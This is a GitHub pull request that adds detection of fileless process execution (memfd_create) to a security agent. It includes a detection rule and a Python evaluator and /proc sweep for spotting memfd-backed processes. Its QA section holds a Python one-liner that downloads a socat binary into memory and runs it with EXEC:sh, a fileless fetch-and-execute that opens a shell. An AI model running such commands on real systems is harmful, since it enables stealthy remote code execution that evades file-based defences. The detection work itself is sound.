
[CWS] Detect fileless execution

Open modernplumbing opened this issue 2 years ago • 0 comments

What does this PR do?

https://datadoghq.atlassian.net/wiki/spaces/SA/pages/2593980417/Fileless+Process+Execution

This feature catches the usage of the memfd_create syscall (https://man7.org/linux/man-pages/man2/memfd_create.2.html) with a rule like exec.file.path =~ "/memfd:*".

Motivation

Additional Notes

Possible Drawbacks / Trade-offs

Describe how to test/QA your changes

Add rule like exec.file.path =~ "/memfd:*" and trigger with a command like:

python3 -c 'import os;from urllib.request import urlopen;fd = os.memfd_create("", os.MFD_CLOEXEC);f2=open("/proc/self/fd/"+str(fd), "wb");f1=urlopen("https://github.com/3ndG4me/socat/releases/download/v1.7.3.3/socatx64.bin").read();f2.write(f1);f2.close();os.execv("/proc/self/fd/"+str(fd), ["kittens", "TCP:127.0.0.1:4242", "EXEC:sh"])'
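To show what the rule above is matching, and how a responder can check a host for the same condition outside the agent, here is an added example (not code from this PR or from datadog-agent): a minimal evaluator for `exec.file.path =~ "/memfd:*"` over constructed exec events, plus a `/proc` sweep that lists processes whose `exe` link points at a memfd-backed image (the kernel renders those as `/memfd:<name> (deleted)`). The event shape and the fake `/proc` tree are constructed for the demo.

```python
import fnmatch
import os
import tempfile

# Rule from the PR: exec.file.path =~ "/memfd:*"  (glob match on the exec path)
MEMFD_RULE_PATTERN = "/memfd:*"


def matches_memfd_rule(exec_file_path: str) -> bool:
    """Evaluate exec.file.path =~ "/memfd:*" for a single exec event path."""
    return fnmatch.fnmatchcase(exec_file_path, MEMFD_RULE_PATTERN)


def evaluate_exec_events(events):
    """Return pids of exec events whose path matches the memfd rule.
    `events` is a list of {"pid": int, "exec.file.path": str} dicts, a
    constructed, simplified stand-in for CWS exec events (assumption)."""
    return [e["pid"] for e in events if matches_memfd_rule(e["exec.file.path"])]


def find_memfd_processes(proc_root="/proc"):
    """Host-side check: (pid, exe_target) for processes whose /proc/<pid>/exe
    symlink points at a memfd-backed image, e.g. "/memfd:kittens (deleted)"."""
    found = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            target = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue  # kernel threads, exited or unreadable processes
        if target.startswith("/memfd:"):
            found.append((int(entry), target))
    return sorted(found)


def _build_fake_proc():
    """Construct a fake /proc tree (two pids) so the sweep can run offline."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "1234"))
    os.symlink("/memfd:kittens (deleted)", os.path.join(root, "1234", "exe"))
    os.makedirs(os.path.join(root, "42"))
    os.symlink("/usr/bin/python3", os.path.join(root, "42", "exe"))
    return root


if __name__ == "__main__":
    sample = [{"pid": 1234, "exec.file.path": "/memfd: (deleted)"},
              {"pid": 42, "exec.file.path": "/usr/bin/python3"}]
    print(evaluate_exec_events(sample))              # [1234]
    print(find_memfd_processes(_build_fake_proc()))  # [(1234, '/memfd:kittens (deleted)')]
```

Running `find_memfd_processes()` with the default `/proc` root on a live Linux host lists any currently running memfd-backed processes, which is a useful cross-check while QA-ing the rule with the command above.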

Reviewer's Checklist

  • [ ] If known, an appropriate milestone has been selected; otherwise the Triage milestone is set.
  • [ ] Use the major_change label if your change either has a major impact on the code base, impacts multiple teams, or changes important, well-established internals of the Agent. This label will be used during QA to make sure each team pays extra attention to the changed behavior. For any customer-facing change, use a releasenote.
  • [ ] A release note has been added or the changelog/no-changelog label has been applied.
  • [ ] Changed code has automated tests for its functionality.
  • [ ] Adequate QA/testing plan information is provided if the qa/skip-qa label is not applied.
  • [ ] At least one team/.. label has been applied, indicating the team(s) that should QA this change.
  • [ ] If applicable, docs team has been notified or an issue has been opened on the documentation repo.
  • [ ] If applicable, the need-change/operator and need-change/helm labels have been applied.
  • [ ] If applicable, the k8s/<min-version> label has been applied, indicating the lowest Kubernetes version compatible with this feature.
  • [ ] If applicable, the config template has been updated.

modernplumbing · Sep 14 '22 03:09